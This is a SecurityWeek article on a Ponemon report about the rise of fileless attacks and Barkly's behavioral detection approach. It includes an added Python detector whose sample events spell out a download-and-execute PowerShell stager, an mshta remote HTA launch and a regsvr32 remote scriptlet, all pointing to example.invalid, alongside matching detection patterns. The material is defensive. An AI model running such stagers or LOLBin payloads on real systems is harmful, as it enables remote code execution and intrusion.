Fileless Attacks Ten Times More Likely to Succeed: Report

A new report from the Ponemon Institute confirms, and quantifies, what most people already know: protecting endpoints is becoming more difficult, more complex and more time-consuming, but not necessarily more successful.

Commissioned by endpoint protection firm Barkly, the report (PDF) confirms that defenders are moving away from primarily signature-based malware detection, either replacing their existing defenses or supplementing them with additional protection or response capabilities. One third of respondents have replaced their existing AV product, while half have retained their existing product but supplemented it with additional protections.

To get past both the old and the new defenses, attackers are responding with a different attack methodology: the fileless attack. Ponemon notes that 29% of attacks in 2017 were fileless, up from 20% in 2016, and expects the share to rise to 35% in 2018.

A fileless attack does not write a malicious executable to disk for a scanner to find. These attacks, says Ponemon, “instead leverage exploits designed to run malicious code or launch scripts directly from memory, infecting endpoints without leaving easily-discoverable artifacts behind. Once an endpoint has been compromised, these attacks can also abuse legitimate system administration tools and processes to gain persistence, elevate privileges, and spread laterally across the network.”

According to Ponemon, 54% of companies have experienced one or more successful attacks that compromised data and/or infrastructure, and 77% of those attacks used exploits or fileless techniques. While the attack methodology has changed, the ultimate goal of the attacker has not. Ransomware, for example, remains a major problem: half of the surveyed organizations suffered a ransomware incident in 2017, and 40% of those experienced multiple incidents. The average ransomware demand is now $3,675.

The implication from these figures is that bad guys can adapt to new security faster than good guys can adapt to new attacks. Barkly’s CTO Jack Danahy doesn’t believe that this is inevitable. “For us,” he told SecurityWeek, “the problem is behavioral.” Since the bad guys will always get better at obfuscating what they are doing, plus the reality that they have equal access to the technologies that the good guys use, “you know that they are going to look for ways to get around the entire class of defense.” 

Fileless attacks are the attackers' response to file-based detection, whether it is traditional signature scanning or the newer machine-learning classifiers. Looking at the two bodies of technology, the older and the newer endpoint protection products, there is a common factor: they are all file-based. Both still need a file to examine, and that is what led to the development of fileless attacks. “We knew right from the beginning that we had to concentrate on stopping attacks because of their behavior, not because of any malware files they use. We had to find a way,” he explained, “to identify really low-level, really early behaviors that are representative of when malware is trying to set itself up, before it can do any corrupting activity.”

To do this, Barkly developed a system that would examine both good behaviors and bad behaviors, and to be able to ‘disambiguate’ the two. “This is opposed to the standard method of looking for changes that have already happened or specific attributes of existing files in order to know that something bad is happening. That’s too late,” he said. 

The end result is a SaaS product that updates its ability to differentiate between good and bad behavior on a daily basis — using Barkly’s own ‘responsive machine-learning’ (a combination of both supervised and unsupervised machine learning). “It’s like a factory of bad behaviors and a factory of good behaviors, with machine learning to disambiguate the two,” he said. 
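To make concrete both the fileless techniques Ponemon describes above (scripts launched straight from memory, legitimate administration tools abused once an endpoint is compromised) and the behavioral rather than file-centric detection Danahy argues for, here is an added example that is not from the report, from Barkly, or from SecurityWeek. It is a small Python rule set run over constructed process-creation events shaped like the fields Sysmon Event ID 1 records (image, parent image, command line). The hostnames, commands, rule names and sample events are invented for illustration; the rules look at what a process does and who launched it, never at a file hash.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Living-off-the-land script hosts that fileless attacks typically abuse.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmd.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Tokens that indicate script content is being fetched or loaded in memory.
IN_MEMORY_MARKERS = re.compile(
    r"\b(iex|invoke-expression|downloadstring|downloadfile|frombase64string|add-type)\b"
    r"|reflection\.assembly", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the common spellings.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


@dataclass
class ProcessEvent:
    """Minimal process-creation record (the fields Sysmon Event ID 1 carries)."""
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: ProcessEvent) -> List[str]:
    """Return the names of the behavioral rules an event trips; empty means nothing suspicious."""
    findings: List[str] = []
    image, parent = basename(event.image), basename(event.parent_image)
    decoded = decode_encoded_command(event.command_line)
    # Inspect the decoded script as well as the raw command line, so encoding hides nothing.
    effective = event.command_line if decoded is None else event.command_line + " " + decoded
    if decoded is not None:
        findings.append("encoded_powershell")
    if image in {"powershell.exe", "pwsh.exe"} and IN_MEMORY_MARKERS.search(effective):
        findings.append("in_memory_script_loading")
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append("office_spawned_script_host")
    if image in {"mshta.exe", "regsvr32.exe", "rundll32.exe"} and REMOTE_URL.search(event.command_line):
        findings.append("lolbin_remote_payload")
    return findings


def scan(events: List[ProcessEvent]) -> List[Tuple[str, List[str]]]:
    """Run every event through the rules; return (image, findings) for flagged events only."""
    flagged = []
    for event in events:
        findings = analyze(event)
        if findings:
            flagged.append((basename(event.image), findings))
    return flagged


# Constructed sample telemetry (hostnames and commands are invented for illustration).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 "powershell.exe -NoProfile -Command Get-Process"),          # benign admin use
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 f"powershell.exe -w hidden -nop -enc {ENCODED_STAGER}"),   # macro-launched stager
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 "mshta.exe http://example.invalid/launch.hta"),             # remote HTA
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\System32\cmd.exe",
                 "regsvr32.exe /s /n /u /i:https://example.invalid/payload.sct scrobj.dll"),
]

if __name__ == "__main__":
    for image, findings in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(findings)}")
```

The benign PowerShell event trips nothing, the Word-launched encoded stager trips three rules at once, and the mshta and regsvr32 events are caught by their remote-URL arguments even though no file is ever written. A production version of this idea would also correlate parent-child chains over time and consume PowerShell script block logs or AMSI scan results rather than only the command line, but the point stands: none of these checks needs a file to look at.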

Users do not have a high opinion of most existing endpoint products, notes the Ponemon report. The average organization has seven different software agents on its endpoints to manage security, making it ‘noisy and time-consuming’. Perhaps because of the growing number of products, 73% of organizations say it is getting more difficult to manage endpoint security, and two-thirds do not have the resources to do so adequately.

The biggest problem with most current solutions, according to the Ponemon study, is that they do not provide adequate protection. Danahy is not surprised. “You cannot claim to do endpoint protection unless you can stop both file-based and fileless attacks before they get through and harm the client. A fileless attack is ten times more likely to succeed than a file-based attack.”

According to the study, the total cost of a successful attack is now over $5 million. The ‘cost of a breach’ is a contentious subject because of the variables concerned. Ponemon is known to take great care over its conclusions, but Danahy agrees it’s a difficult concept. “That’s why,” he told SecurityWeek, “I insisted on the ‘average cost per employee’ being included.” This figure stands at $301. It makes it easier for smaller firms to realistically consider the likely cost to themselves.

Ponemon’s conclusion from the study is that organizations would “benefit from endpoint security solutions designed to block new threats like fileless attacks, which are responsible for the majority of today’s endpoint compromises. To restore their faith in endpoint security’s effectiveness, new solutions need to address this crucial gap in protection without adding unnecessary complexity to endpoint management.”

Related: Fileless Trojan Kovter Poses as Firefox Update 

Related: Firms Increasingly Turn to Machine Learning for Security Solutions 

Related: Threat Hunting with Machine Learning, AI, and Cognitive Computing 

Written By

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.
